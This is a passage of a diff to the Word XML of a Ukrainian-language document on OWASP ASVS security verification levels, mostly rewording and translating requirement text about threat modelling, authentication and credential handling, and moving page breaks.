       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5635,7 +5625,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Зручність </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -5740,8 +5729,17 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Адаптируемость (adaptability). Здатність ПЗ пристосовуватися до </w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Адаптованість</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (adaptability). Здатність ПЗ пристосовуватися до </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6066,6 +6064,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:br/>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -6149,21 +6148,18 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Рівень 3 для найбільш важливих додатків - додатків, які </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:strike/>
+        <w:t xml:space="preserve">Рівень 3 для найбільш важливих додатків - додатків, які містять конфіденційні медичні дані, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>виконують високі операції значення</w:t>
+        <w:t>чутливі дані користувачів або будь-який додаток, який</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6174,7 +6170,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>, містять конфіденційні медичні дані, або будь-який додаток, яке вимагає високого рівня довіри.</w:t>
+        <w:t xml:space="preserve"> вимагає високого рівня довіри.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6479,7 +6475,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+        <w:t xml:space="preserve">Рівень 1 зазвичай підходить для додатків, де потрібна низька впевненість у </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6488,6 +6484,18 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">правильному використанні засобів контролю безпеки або для швидкого аналізу парку корпоративних додатків або сприяння в розробці пріоритетного списку вимог безпеки в рамках багатофазного зусилля. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:t xml:space="preserve">Елементи управління </w:t>
       </w:r>
@@ -6511,18 +6519,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
+        <w:t xml:space="preserve">івня 1 можуть бути забезпечені або автоматично за допомогою інструментів, або просто вручну без доступу до вихідного коду. Ми розглядаємо </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -6676,48 +6673,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>або</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>стандарт</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">), </w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7072,7 +7030,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ASVS Рівень 3 є високий рівень </w:t>
+        <w:t xml:space="preserve">Рівень 3 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7082,7 +7040,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>контролю в межах рівн</w:t>
+        <w:t>забезпечує</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7092,7 +7050,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>ів</w:t>
+        <w:t xml:space="preserve"> високий рівень </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7102,7 +7060,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ASVS. Він, як правило, зарезервований</w:t>
+        <w:t>контролю в межах рівн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7112,7 +7070,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті</w:t>
+        <w:t>ів</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7122,7 +7080,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>, що використовуються в таких галузях як: охорона здоров</w:t>
+        <w:t xml:space="preserve"> ASVS. Він, як правило, зарезервований</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7132,7 +7090,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>’</w:t>
+        <w:t xml:space="preserve"> для додатків, що вимагають значних рівнів перевірки безпеки, таких, як ті</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7142,7 +7100,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>я, військова,</w:t>
+        <w:t>, що використовуються в таких галузях як: охорона здоров</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7152,7 +7110,47 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Приклад вказівки по застосуванню ASVS Level 3 представлена ​​нижче. Додаток досягає ASVS 3-го рівня (або Advanced), якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>я, військова,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> для додатків, що виконують критично важливі функції, де збій може істотно вплинути на діяльність організації, і навіть її живучість. Д</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">одаток досягає ASVS 3-го рівня, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>якщо він адекватно захищає від передових вразливостей безпеки додатків, а також демонструє принципи хорошого дизайну безпеки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7193,6 +7191,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Застосування</w:t>
       </w:r>
       <w:r>
@@ -7233,7 +7232,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -7264,18 +7263,119 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="ru-RU"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Прикла</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>д вказівки по застосуванню рівнів ASVS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> представлен</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>о ​​нижче:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>V</w:t>
       </w:r>
       <w:r>
@@ -9141,19 +9241,133 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:strike/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>Verify that a threat model for the target application has been produced and covers off risks associated with Spoofing, Tampering, Repudiation, Information Disclosure, and Elevation of privilege (STRIDE).</w:t>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Переконатися в тому, що додаток захищено від ризиків пов</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>’</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">язаних з підробкою або фальсифікацією, навмисним </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>викриттям інформації</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>D</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                <w:lang w:val="uk-UA"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>o</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                <w:lang w:val="uk-UA"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                <w:lang w:val="uk-UA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> атаками</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="222222"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                <w:lang w:val="uk-UA"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> або підвищенням привілеїв.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9187,7 +9401,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -9222,7 +9436,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -9258,7 +9472,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -9316,6 +9530,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.7</w:t>
             </w:r>
           </w:p>
@@ -9391,18 +9606,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">, які вимагають зовнішніх служб </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>безпеки) мають централізовану реалізацію.</w:t>
+              <w:t>, які вимагають зовнішніх служб безпеки) мають централізовану реалізацію.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -9565,7 +9769,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>1.8</w:t>
             </w:r>
           </w:p>
@@ -10764,14 +10967,23 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:strike/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>що т</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>що тільки уповноважені співробітники можуть</w:t>
+        <w:t>ільки користувачі з певними правами доступу можуть</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10782,7 +10994,29 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> виконувати аутентифікацію і облікові дані транспортуються в безпечному режимі.</w:t>
+        <w:t xml:space="preserve"> виконувати аутентифікацію і </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t xml:space="preserve">при цьому </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>облікові дані транспортуються в безпечному режимі.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11433,7 +11667,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>орми, що містять облікові дані не заповнюються додатк</w:t>
+              <w:t xml:space="preserve">орми, що містять облікові дані не заповнюються </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>додатк</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11533,6 +11778,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:sym w:font="Wingdings" w:char="F0FC"/>
             </w:r>
           </w:p>
@@ -11644,6 +11890,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>2.3</w:t>
             </w:r>
           </w:p>
@@ -11914,7 +12161,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>2.4</w:t>
             </w:r>
           </w:p>
@@ -13746,7 +13992,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> тому, що система може бути налаштована, щоб заборонити використання заданого кількості попередніх паролів.</w:t>
+              <w:t xml:space="preserve"> тому, що система може бути </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
